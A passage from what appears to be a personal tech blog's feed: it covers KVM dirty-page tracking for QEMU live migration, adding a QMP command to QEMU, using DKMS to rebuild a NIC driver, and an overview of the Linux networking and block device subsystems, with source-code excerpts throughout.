#12 0x00007f0cda1fd494 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0
#13 0x00007f0cd9f3facf in clone () from /lib/x86_64-linux-gnu/libc.so.6
</code></pre></div></div>
<p>Here we can see the memory topology doesn’t change; only the ‘KVM_MEM_LOG_DIRTY_PAGES’ flag is added.</p>
<p>Now let’s go to the kvm part. As we can see, qemu sends a ‘KVM_SET_USER_MEMORY_REGION’ ioctl
and the kernel goes to ‘__kvm_set_memory_region’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __kvm_set_memory_region(struct kvm *kvm,
const struct kvm_userspace_memory_region *mem)
{
if (npages) {
if (!old.npages)
change = KVM_MR_CREATE;
else { /* Modify an existing slot. */
if ((mem->userspace_addr != old.userspace_addr) ||
(npages != old.npages) ||
((new.flags ^ old.flags) & KVM_MEM_READONLY))
goto out;
if (base_gfn != old.base_gfn)
change = KVM_MR_MOVE;
else if (new.flags != old.flags)
change = KVM_MR_FLAGS_ONLY;
else { /* Nothing to change. */
r = 0;
goto out;
}
}
...
/* Allocate page dirty bitmap if needed */
if ((new.flags & KVM_MEM_LOG_DIRTY_PAGES) && !new.dirty_bitmap) {
if (kvm_create_dirty_bitmap(&new) < 0)
goto out_free;
}
...
}
</code></pre></div></div>
<p>The most important work here is to call ‘kvm_create_dirty_bitmap’ to allocate a bitmap;
for every memslot it will allocate memslot->dirty_bitmap in this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/*
* Allocation size is twice as large as the actual dirty bitmap size.
* See x86's kvm_vm_ioctl_get_dirty_log() why this is needed.
*/
static int kvm_create_dirty_bitmap(struct kvm_memory_slot *memslot)
{
unsigned long dirty_bytes = 2 * kvm_dirty_bitmap_bytes(memslot);
memslot->dirty_bitmap = kvm_kvzalloc(dirty_bytes);
if (!memslot->dirty_bitmap)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>Then it goes to ‘kvm_arch_commit_memory_region’ and ‘kvm_mmu_slot_remove_write_access’.
Notice this is not the newest implementation but an old kernel (3.13).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_slot_remove_write_access(struct kvm *kvm, int slot)
{
struct kvm_memory_slot *memslot;
gfn_t last_gfn;
int i;
memslot = id_to_memslot(kvm->memslots, slot);
last_gfn = memslot->base_gfn + memslot->npages - 1;
spin_lock(&kvm->mmu_lock);
for (i = PT_PAGE_TABLE_LEVEL;
i < PT_PAGE_TABLE_LEVEL + KVM_NR_PAGE_SIZES; ++i) {
unsigned long *rmapp;
unsigned long last_index, index;
rmapp = memslot->arch.rmap[i - PT_PAGE_TABLE_LEVEL];
last_index = gfn_to_index(last_gfn, memslot->base_gfn, i);
for (index = 0; index <= last_index; ++index, ++rmapp) {
if (*rmapp)
__rmap_write_protect(kvm, rmapp, false);
if (need_resched() || spin_needbreak(&kvm->mmu_lock)) {
kvm_flush_remote_tlbs(kvm);
cond_resched_lock(&kvm->mmu_lock);
}
}
}
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
}
</code></pre></div></div>
<p>As the function name implies, it removes write access from this memory slot.</p>
<p>Here we just focus on normal 4K pages, not 2M and 1G pages. ‘memslot->arch.rmap’ is a gfn->spte map; given a gfn we can find the corresponding spte.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __rmap_write_protect(struct kvm *kvm, unsigned long *rmapp,
bool pt_protect)
{
u64 *sptep;
struct rmap_iterator iter;
bool flush = false;
for (sptep = rmap_get_first(*rmapp, &iter); sptep;) {
BUG_ON(!(*sptep & PT_PRESENT_MASK));
if (spte_write_protect(kvm, sptep, &flush, pt_protect)) {
sptep = rmap_get_first(*rmapp, &iter);
continue;
}
sptep = rmap_get_next(&iter);
}
return flush;
}
static bool
spte_write_protect(struct kvm *kvm, u64 *sptep, bool *flush, bool pt_protect)
{
u64 spte = *sptep;
if (!is_writable_pte(spte) &&
!(pt_protect && spte_is_locklessly_modifiable(spte)))
return false;
rmap_printk("rmap_write_protect: spte %p %llx\n", sptep, *sptep);
if (__drop_large_spte(kvm, sptep)) {
*flush |= true;
return true;
}
if (pt_protect)
spte &= ~SPTE_MMU_WRITEABLE;
spte = spte & ~PT_WRITABLE_MASK;
*flush |= mmu_spte_update(sptep, spte);
return false;
}
</code></pre></div></div>
<p>So here for every gfn, we remove the write access. After returning from this ioctl, the guest’s RAM
has been marked non-writable; every write will exit to KVM, which marks the page dirty. This is what ‘start the dirty log’ means.</p>
<p>When the guest writes the memory, it triggers an EPT violation vmexit, which then calls ‘tdp_page_fault’.
Because this is caused by write protection, the CPU sets the error code to ‘PFERR_WRITE_MASK’, so ‘fast_page_fault’
and ‘fast_pf_fix_direct_spte’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool
fast_pf_fix_direct_spte(struct kvm_vcpu *vcpu, u64 *sptep, u64 spte)
{
struct kvm_mmu_page *sp = page_header(__pa(sptep));
gfn_t gfn;
WARN_ON(!sp->role.direct);
/*
* The gfn of direct spte is stable since it is calculated
* by sp->gfn.
*/
gfn = kvm_mmu_page_get_gfn(sp, sptep - sp->spt);
if (cmpxchg64(sptep, spte, spte | PT_WRITABLE_MASK) == spte)
mark_page_dirty(vcpu->kvm, gfn);
return true;
}
void mark_page_dirty(struct kvm *kvm, gfn_t gfn)
{
struct kvm_memory_slot *memslot;
memslot = gfn_to_memslot(kvm, gfn);
mark_page_dirty_in_slot(kvm, memslot, gfn);
}
void mark_page_dirty_in_slot(struct kvm *kvm, struct kvm_memory_slot *memslot,
gfn_t gfn)
{
if (memslot && memslot->dirty_bitmap) {
unsigned long rel_gfn = gfn - memslot->base_gfn;
set_bit_le(rel_gfn, memslot->dirty_bitmap);
}
}
</code></pre></div></div>
<p>Here we can see it sets the spte writable again and sets the bit in the dirty bitmap.</p>
<h3> qemu sync dirty log with kvm </h3>
<p>Let’s go back to ‘ram_save_init_globals’. After telling kvm to start the dirty log, it calls ‘migration_bitmap_sync’.
This function calls ‘memory_global_dirty_log_sync’ to get the dirty bitmap from kvm; ‘kvm_log_sync’ does this work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_log_sync(MemoryListener *listener,
MemoryRegionSection *section)
{
KVMMemoryListener *kml = container_of(listener, KVMMemoryListener, listener);
int r;
r = kvm_physical_sync_dirty_bitmap(kml, section);
if (r < 0) {
abort();
}
}
static int kvm_physical_sync_dirty_bitmap(KVMMemoryListener *kml,
MemoryRegionSection *section)
{
KVMState *s = kvm_state;
unsigned long size, allocated_size = 0;
struct kvm_dirty_log d = {};
KVMSlot *mem;
int ret = 0;
hwaddr start_addr = section->offset_within_address_space;
hwaddr end_addr = start_addr + int128_get64(section->size);
d.dirty_bitmap = NULL;
while (start_addr < end_addr) {
mem = kvm_lookup_overlapping_slot(kml, start_addr, end_addr);
if (mem == NULL) {
break;
}
...
size = ALIGN(((mem->memory_size) >> TARGET_PAGE_BITS),
/*HOST_LONG_BITS*/ 64) / 8;
if (!d.dirty_bitmap) {
d.dirty_bitmap = g_malloc(size);
} else if (size > allocated_size) {
d.dirty_bitmap = g_realloc(d.dirty_bitmap, size);
}
allocated_size = size;
memset(d.dirty_bitmap, 0, allocated_size);
d.slot = mem->slot | (kml->as_id << 16);
if (kvm_vm_ioctl(s, KVM_GET_DIRTY_LOG, &d) == -1) {
DPRINTF("ioctl failed %d\n", errno);
ret = -1;
break;
}
kvm_get_dirty_pages_log_range(section, d.dirty_bitmap);
start_addr = mem->start_addr + mem->memory_size;
}
g_free(d.dirty_bitmap);
return ret;
}
</code></pre></div></div>
<p>Here we can see qemu sends out a ‘KVM_GET_DIRTY_LOG’ ioctl. In kvm:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_vm_ioctl_get_dirty_log(struct kvm *kvm, struct kvm_dirty_log *log)
{
int r;
struct kvm_memory_slot *memslot;
unsigned long n, i;
unsigned long *dirty_bitmap;
unsigned long *dirty_bitmap_buffer;
bool is_dirty = false;
mutex_lock(&kvm->slots_lock);
r = -EINVAL;
if (log->slot >= KVM_USER_MEM_SLOTS)
goto out;
memslot = id_to_memslot(kvm->memslots, log->slot);
dirty_bitmap = memslot->dirty_bitmap;
r = -ENOENT;
if (!dirty_bitmap)
goto out;
n = kvm_dirty_bitmap_bytes(memslot);
dirty_bitmap_buffer = dirty_bitmap + n / sizeof(long);
memset(dirty_bitmap_buffer, 0, n);
spin_lock(&kvm->mmu_lock);
for (i = 0; i < n / sizeof(long); i++) {
unsigned long mask;
gfn_t offset;
if (!dirty_bitmap[i])
continue;
is_dirty = true;
mask = xchg(&dirty_bitmap[i], 0);
dirty_bitmap_buffer[i] = mask;
offset = i * BITS_PER_LONG;
kvm_mmu_write_protect_pt_masked(kvm, memslot, offset, mask);
}
if (is_dirty)
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
r = -EFAULT;
if (copy_to_user(log->dirty_bitmap, dirty_bitmap_buffer, n))
goto out;
r = 0;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>It copies the dirty bitmap to userspace and also write-protects the sptes again using ‘kvm_mmu_write_protect_pt_masked’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
struct kvm_memory_slot *slot,
gfn_t gfn_offset, unsigned long mask)
{
unsigned long *rmapp;
while (mask) {
rmapp = __gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
PT_PAGE_TABLE_LEVEL, slot);
__rmap_write_protect(kvm, rmapp, false);
/* clear the first set bit */
mask &= mask - 1;
}
}
</code></pre></div></div>
<p>So the next time the guest writes to this page, it will be marked dirty again.</p>
<p>Back in qemu, ‘kvm_get_dirty_pages_log_range’ calls ‘cpu_physical_memory_set_dirty_lebitmap’.</p>
<p>The latter function sets the ‘ram_list.dirty_memory[i]->blocks’ dirty bitmap.
This dirty bitmap lives in ‘ram_list’, not in the migration code.</p>
<h3> qemu copy dirty bitmap to migration bitmap </h3>
<p>In ‘migration_bitmap_sync’, after the call of ‘memory_global_dirty_log_sync’,
‘migration_bitmap_sync_range’ is called for every block. This copies the ‘ram_list’
dirty bitmap to ‘migration_bitmap_rcu->bmap’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void migration_bitmap_sync_range(ram_addr_t start, ram_addr_t length)
{
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
migration_dirty_pages +=
cpu_physical_memory_sync_dirty_bitmap(bitmap, start, length);
}
static inline
uint64_t cpu_physical_memory_sync_dirty_bitmap(unsigned long *dest,
ram_addr_t start,
ram_addr_t length)
{
ram_addr_t addr;
unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS);
uint64_t num_dirty = 0;
/* start address is aligned at the start of a word? */
if (((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) {
...
src = atomic_rcu_read(
&ram_list.dirty_memory[DIRTY_MEMORY_MIGRATION])->blocks;
for (k = page; k < page + nr; k++) {
if (src[idx][offset]) {
unsigned long bits = atomic_xchg(&src[idx][offset], 0);
unsigned long new_dirty;
new_dirty = ~dest[k];
dest[k] |= bits;
new_dirty &= bits;
num_dirty += ctpopl(new_dirty);
}
...
return num_dirty;
}
</code></pre></div></div>
<p>Now the ‘migration_bitmap_rcu->bmap’ knows all the dirty pages. Of course this is not very useful during
the setup process, as qemu has already set all of ‘migration_bitmap_rcu->bmap’ to 1.</p>
<h3> find the dirty pages and send out </h3>
<p>After the setup, we come to the most important process: iteratively sending pages to the dest, and once a watermark
is reached, stopping the machine and sending all the remaining dirty pages. The overview is as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
...
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
...
if (pending_size && pending_size >= max_size) {
/* Still a significant amount to transfer */
if (migrate_postcopy_ram() &&
s->state != MIGRATION_STATUS_POSTCOPY_ACTIVE &&
pend_nonpost <= max_size &&
atomic_read(&s->start_postcopy)) {
if (!postcopy_start(s, &old_vm_running)) {
current_active_state = MIGRATION_STATUS_POSTCOPY_ACTIVE;
entered_postcopy = true;
}
continue;
}
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
trace_migration_thread_low_pending(pending_size);
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
}
</code></pre></div></div>
<p>This shows the three most important functions: ‘qemu_savevm_state_pending’, ‘qemu_savevm_state_iterate’ and
‘migration_completion’. For ram, the save pending function is ‘ram_save_pending’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ram_save_pending(QEMUFile *f, void *opaque, uint64_t max_size,
uint64_t *non_postcopiable_pending,
uint64_t *postcopiable_pending)
{
uint64_t remaining_size;
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
if (!migration_in_postcopy(migrate_get_current()) &&
remaining_size < max_size) {
qemu_mutex_lock_iothread();
rcu_read_lock();
migration_bitmap_sync();
rcu_read_unlock();
qemu_mutex_unlock_iothread();
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
}
/* We can do postcopy, and all the data is postcopiable */
*postcopiable_pending += remaining_size;
}
</code></pre></div></div>
<p>This function calls ‘migration_bitmap_sync’ to get the dirty page bitmap into ‘migration_bitmap_rcu->bmap’.
In the iterate function ‘ram_save_iterate’, it calls ‘ram_find_and_save_block’ to find the dirty pages and
send them out to the dest host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int ram_save_iterate(QEMUFile *f, void *opaque)
{
int ret;
int i;
int64_t t0;
int done = 0;
rcu_read_lock();
if (ram_list.version != last_version) {
reset_ram_globals();
}
/* Read version before ram_list.blocks */
smp_rmb();
ram_control_before_iterate(f, RAM_CONTROL_ROUND);
t0 = qemu_clock_get_ns(QEMU_CLOCK_REALTIME);
i = 0;
while ((ret = qemu_file_rate_limit(f)) == 0) {
int pages;
pages = ram_find_and_save_block(f, false, &bytes_transferred);
/* no more pages to sent */
if (pages == 0) {
done = 1;
break;
}
acct_info.iterations++;
/* we want to check in the 1st loop, just in case it was the 1st time
and we had to sync the dirty bitmap.
qemu_get_clock_ns() is a bit expensive, so we only check each some
iterations
*/
if ((i & 63) == 0) {
uint64_t t1 = (qemu_clock_get_ns(QEMU_CLOCK_REALTIME) - t0) / 1000000;
if (t1 > MAX_WAIT) {
DPRINTF("big wait: %" PRIu64 " milliseconds, %d iterations\n",
t1, i);
break;
}
}
i++;
}
...
return done;
}
</code></pre></div></div>
<p>‘ram_find_and_save_block’->’get_queued_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool get_queued_page(MigrationState *ms, PageSearchStatus *pss,
ram_addr_t *ram_addr_abs)
{
RAMBlock *block;
ram_addr_t offset;
bool dirty;
do {
block = unqueue_page(ms, &offset, ram_addr_abs);
/*
* We're sending this page, and since it's postcopy nothing else
* will dirty it, and we must make sure it doesn't get sent again
* even if this queue request was received after the background
* search already sent it.
*/
if (block) {
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
dirty = test_bit(*ram_addr_abs >> TARGET_PAGE_BITS, bitmap);
if (!dirty) {
trace_get_queued_page_not_dirty(
block->idstr, (uint64_t)offset,
(uint64_t)*ram_addr_abs,
test_bit(*ram_addr_abs >> TARGET_PAGE_BITS,
atomic_rcu_read(&migration_bitmap_rcu)->unsentmap));
} else {
trace_get_queued_page(block->idstr,
(uint64_t)offset,
(uint64_t)*ram_addr_abs);
}
}
} while (block && !dirty);
if (block) {
/*
* As soon as we start servicing pages out of order, then we have
* to kill the bulk stage, since the bulk stage assumes
* in (migration_bitmap_find_and_reset_dirty) that every page is
* dirty, that's no longer true.
*/
ram_bulk_stage = false;
/*
* We want the background search to continue from the queued page
* since the guest is likely to want other pages near to the page
* it just requested.
*/
pss->block = block;
pss->offset = offset;
}
return !!block;
}
</code></pre></div></div>
<p>In this function we find the dirty pages in the bitmap.</p>
<p>The following shows the process of dirty bitmap tracking.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+-------------+ +----------+ +--------------+ +---------------------+
| | | ram_list +-----> | dirty_memory +--------> | migration_bitmap_rcu|
| | +----------+ +------+-------+ +---------------------+
| Guest | ^
| | |
| | |
| | |
| +--------------------------------+ |
| | | |
| | | |
| | | |
| | v |
| | |
| | +---------+ +-------+--------+
| | | memslot +-----> | dirty_bitmap |
+-------------+ +---------+ +----------------+
</code></pre></div></div>
Add a new qmp command for qemu 2018-07-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/25/add-new-qmp
<p>There is detailed <a href="https://github.com/qemu/qemu/blob/master/docs/devel/writing-qmp-commands.txt">documentation</a> for writing a new qmp command for qemu; I just make a note of it here. As the documentation says, creating a new qmp command needs the following four steps:</p>
<ol>
<li>
<p>Define the command and any types it needs in the appropriate QAPI
schema module.</p>
</li>
<li>
<p>Write the QMP command itself, which is a regular C function. Preferably,
the command should be exported by some QEMU subsystem. But it can also be
added to the qmp.c file</p>
</li>
<li>
<p>At this point the command can be tested under the QMP protocol</p>
</li>
<li>
<p>Write the HMP command equivalent. This is not required and should only be
done if it does make sense to have the functionality in HMP. The HMP command
is implemented in terms of the QMP command</p>
</li>
</ol>
<p>The first step is to add the command in qapi-schema.json file. Add following command to the last of the file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ 'command': 'qmp-test', 'data': {'value': 'int'} }
</code></pre></div></div>
<p>Second, add the QMP processing function, add following function to qmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int test_a = 0;
void qmp_qmp_test(int64_t value, Error **errp)
{
if (value > 100 || value < 0)
{
error_setg(errp, QERR_INVALID_PARAMETER_VALUE, "value a", "not valid");
return;
}
test_a = value;
}
</code></pre></div></div>
<p>At this point, we can send the qmp command to qemu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"execute":"qmp-test","arguments":{"value":80}}
</code></pre></div></div>
<p>Also we often want to send more human readable command, so we can add hmp command.</p>
<p>Add following to hmp-commands.hx in the middle of it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
.name = "qmp-test",
.args_type = "value:i",
.params = "value",
.help = "set test a.",
.cmd = hmp_qmp_test,
},
STEXI
@item qmp-test @var{value}
Set test a to @var{value}.
ETEXI
</code></pre></div></div>
<p>Add following to last of hmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict)
{
int64_t value = qdict_get_int(qdict, "value");
qmp_qmp_test(value, NULL);
}
</code></pre></div></div>
<p>Add following to last of hmp.h file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict);
</code></pre></div></div>
<p>After compiling qemu, we can use the ‘qmp-test 80’ command in the monitor.</p>
dkms 1012018-07-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/14/dkms-101
<p>Loadable kernel modules are very useful for dynamically adding functionality to the running kernel.
As Linux is free, we can update/install a new kernel easily. For some distributions, every time we install a new kernel, we need to recompile our loadable modules at the same time. This is tedious and can sometimes even cause harm. This is where Dynamic Kernel Module Support (DKMS) plays a role. DKMS is a program/framework for building Linux kernel modules whose sources generally reside outside the kernel source tree, and DKMS modules are automatically rebuilt when a new kernel is installed.</p>
<p>This article will just focus on how to use dkms, not its internals.</p>
<p>Let’s use the x710 network card VF driver as an example.</p>
<h3> No DKMS </h3>
<p>First, let’s see the system’s self-contained i40evf driver.</p>
<p><img src="/assets/img/dkms/1.png" alt="" /></p>
<p>Here it has an old version of the driver. We manually override it with a newer version.</p>
<p><img src="/assets/img/dkms/2.png" alt="" /></p>
<p>It works. Now let’s update the dist, which also updates the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get dist-upgrade
</code></pre></div></div>
<p>Look at i40evf again: it has rolled back to the old version. If we want to use the newer i40evf, we need to compile it again.</p>
<p><img src="/assets/img/dkms/3.png" alt="" /></p>
<h3> With DKMS </h3>
<p>First, we need to move the source files into the /usr/src directory. For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/src/i40evf-3.4.2
</code></pre></div></div>
<p>Notice that the i40evf-3.4.2 directory here is the src directory from i40evf-3.4.2.tar.gz.</p>
<p>In this directory we need to create a file named dkms.conf with the following content.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:/usr/src/i40evf-3.4.2# cat dkms.conf
PACKAGE_NAME="i40evf"
PACKAGE_VERSION="3.4.2"
CLEAN="make clean"
BUILT_MODULE_NAME[0]="i40evf"
DEST_MODULE_LOCATION[0]="/updates"
AUTOINSTALL="yes"
</code></pre></div></div>
<p>Then install the dkms package.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get install dkms
</code></pre></div></div>
<p><img src="/assets/img/dkms/4.png" alt="" /></p>
<p>Don’t forget to install the linux-headers package needed to build the module.</p>
<p>Now the i40evf has been updated to 3.4.2.</p>
<p><img src="/assets/img/dkms/5.png" alt="" /></p>
<p>Upgrade the dist and reboot.</p>
<p><img src="/assets/img/dkms/6.png" alt="" /></p>
<p>Notice the md5 checksum: it confirms the i40evf module was automatically rebuilt.</p>
<p>Also, ‘dkms status’ shows the installed DKMS modules.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:~# dkms status
i40evf, 3.4.2, 4.9.0-3-amd64, x86_64: installed
i40evf, 3.4.2, 4.9.0-6-amd64, x86_64: installed
</code></pre></div></div>
Linux kernel networking: a general introduction — 2018-06-17 — http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/17/linux-net-general-intro
<p>Linux networking originates from the BSD socket implementation, like most Unix-like operating systems, and implements the TCP/IP protocol suite. The TCP/IP stack conceptually contains four layers: the application layer on top, then the transport layer, then the IP layer, and finally the data link layer. The Linux networking stack is very complicated; this article covers only the general architecture, and the following articles will add more details, though I don’t yet know how many there will be.</p>
<p>As we know, there are many protocols in the kernel and many kinds of physical network cards in the world. Linux needs to separate the common code from the code specific to each protocol and device, so function pointers appear everywhere in the network subsystem, and indeed everywhere in the Linux kernel.
The following picture shows the Linux core network architecture.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| system call interface |
+--------------------------+
+------------------------------+
| protocol agnostic interface |
+------------------------------+
+------------------------------+
| network protocols |
+------+------+-------+--------+
| | | | |
| inet | dccp | sctp | packet |
| | | | |
+------+------+-------+--------+
+------------------------------+
| device agnostic interface |
+------------------------------+
+------------------------------+
| device drivers |
+------+------+-------+--------+
| | | | |
|e1000 | virtio vmxnet| ... |
| | | | |
+------+------+-------+--------+
</code></pre></div></div>
<h3 id="system-call-inteface">System call interface</h3>
<p>Easy to understand: all Unix-like operating systems share the same system call interface. socket, bind, listen, accept, connect and the other socket system calls are available in every one of them. A socket is abstracted as a file descriptor, and userspace interacts with the kernel through this fd.</p>
<h3 id="protocol-agnostic-interface">protocol agnostic interface</h3>
<p>This is the struct ‘sock’. Just as struct ‘socket’ connects to the VFS (the fd) for userspace, ‘sock’ connects to the underlying protocols.</p>
<h3 id="network-protocols">network protocols</h3>
<p>Here live the network protocols, for example the IPv4 protocol stack, ipx, irda and the other directories under linux/net. Every protocol stack registers a ‘family’; for IPv4 it is ‘inet_family_ops’. During initialization the kernel adds protocols such as TCP and UDP to the family.</p>
<h3 id="device-agnostic-interface">device agnostic interface</h3>
<p>This layer connects the protocols to the various network devices. It contains the common interface: a device driver can register a network card with ‘register_netdevice’ and send packets with ‘dev_queue_xmit’. None of this is tied to a specific protocol or a specific network device.</p>
<h3 id="device-driver">device driver</h3>
<p>This layer contains the drivers for the physical network card devices that finally do the packet send/receive work. There are many network device drivers in the linux/drivers/net directory.</p>
<p>The next articles will discuss this general picture in more details. Stay hungry, stay foolish.</p>
<h3 id="reference">reference</h3>
<p>Anatomy of the Linux networking stack</p>
Anatomy of the Linux block device driver — 2018-06-14 — http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-block-device-driver
<p>In Linux device drivers, block devices differ from the char devices we discussed before. In this article we will discuss the block device driver.</p>
<h3 id="block-subsystem-initialization">block subsystem initialization</h3>
<p>Block subsystem is initialized in ‘genhd_device_init’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init genhd_device_init(void)
{
int error;
block_class.dev_kobj = sysfs_dev_block_kobj;
error = class_register(&block_class);
if (unlikely(error))
return error;
bdev_map = kobj_map_init(base_probe, &block_class_lock);
blk_dev_init();
register_blkdev(BLOCK_EXT_MAJOR, "blkext");
/* create top-level block dir */
if (!sysfs_deprecated)
block_depr = kobject_create_and_add("block", NULL);
return 0;
}
</code></pre></div></div>
<p>‘block_class’ represents the block device class.
‘bdev_map’ is a ‘struct kobj_map’, which we discussed in the char device driver article.
The initialization work seems quite simple.</p>
<h3 id="register-block-devices-number">register block device’s number</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int register_blkdev(unsigned int major, const char *name)
{
struct blk_major_name **n, *p;
int index, ret = 0;
mutex_lock(&block_class_lock);
/* temporary */
if (major == 0) {
for (index = ARRAY_SIZE(major_names)-1; index > 0; index--) {
if (major_names[index] == NULL)
break;
}
if (index == 0) {
printk("register_blkdev: failed to get major for %s\n",
name);
ret = -EBUSY;
goto out;
}
major = index;
ret = major;
}
p = kmalloc(sizeof(struct blk_major_name), GFP_KERNEL);
if (p == NULL) {
ret = -ENOMEM;
goto out;
}
p->major = major;
strlcpy(p->name, name, sizeof(p->name));
p->next = NULL;
index = major_to_index(major);
for (n = &major_names[index]; *n; n = &(*n)->next) {
if ((*n)->major == major)
break;
}
if (!*n)
*n = p;
else
ret = -EBUSY;
if (ret < 0) {
printk("register_blkdev: cannot get major %d for %s\n",
major, name);
kfree(p);
}
out:
mutex_unlock(&block_class_lock);
return ret;
}
static struct blk_major_name {
struct blk_major_name *next;
int major;
char name[16];
} *major_names[BLKDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_blkdev’ is very similar to ‘register_chrdev_region’, except that the former uses ‘major_names’. ‘register_blkdev’ manages the block device major numbers.</p>
<h3 id="block_device">block_device</h3>
<p>‘block_device’ represents a logical block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device {
dev_t bd_dev; /* not a kdev_t - it's a search key */
int bd_openers;
struct inode * bd_inode; /* will die */
struct super_block * bd_super;
struct mutex bd_mutex; /* open/close mutex */
struct list_head bd_inodes;
void * bd_claiming;
void * bd_holder;
int bd_holders;
bool bd_write_holder;
#ifdef CONFIG_SYSFS
struct list_head bd_holder_disks;
#endif
struct block_device * bd_contains;
unsigned bd_block_size;
struct hd_struct * bd_part;
/* number of times partitions within this device have been opened. */
unsigned bd_part_count;
int bd_invalidated;
struct gendisk * bd_disk;
struct request_queue * bd_queue;
struct list_head bd_list;
/*
* Private data. You must have bd_claim'ed the block_device
* to use this. NOTE: bd_claim allows an owner to claim
* the same device multiple times, the owner must take special
* care to not mess up bd_private for that case.
*/
unsigned long bd_private;
/* The counter of freeze processes */
int bd_fsfreeze_count;
/* Mutex for freeze */
struct mutex bd_fsfreeze_mutex;
};
</code></pre></div></div>
<p>This struct can represent either a complete logical block device or a partition of one. For a complete block device, ‘bd_part’ holds the device’s partition info; for a partition, ‘bd_contains’ points to the block device it belongs to. When a block device or one of its partitions is opened, the kernel creates a ‘block_device’, as we will discuss later. ‘block_device’ connects the virtual file system with the block device driver, so the driver has little reason to touch it directly. ‘block_device’ is closely tied to the ‘bdev’ file system.</p>
<h3 id="struct-gendisk">struct gendisk</h3>
<p>struct gendisk represents a real disk. It is allocated and controlled by the block device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk {
/* major, first_minor and minors are input parameters only,
* don't use directly. Use disk_devt() and disk_max_parts().
*/
int major; /* major number of driver */
int first_minor;
int minors; /* maximum number of minors, =1 for
* disks that can't be partitioned. */
char disk_name[DISK_NAME_LEN]; /* name of major driver */
char *(*devnode)(struct gendisk *gd, umode_t *mode);
unsigned int events; /* supported events */
unsigned int async_events; /* async events, subset of all */
/* Array of pointers to partitions indexed by partno.
* Protected with matching bdev lock but stat and other
* non-critical accesses use RCU. Always access through
* helpers.
*/
struct disk_part_tbl __rcu *part_tbl;
struct hd_struct part0;
const struct block_device_operations *fops;
struct request_queue *queue;
void *private_data;
int flags;
struct device *driverfs_dev; // FIXME: remove
struct kobject *slave_dir;
struct timer_rand_state *random;
atomic_t sync_io; /* RAID */
struct disk_events *ev;
#ifdef CONFIG_BLK_DEV_INTEGRITY
struct blk_integrity *integrity;
#endif
int node_id;
};
</code></pre></div></div>
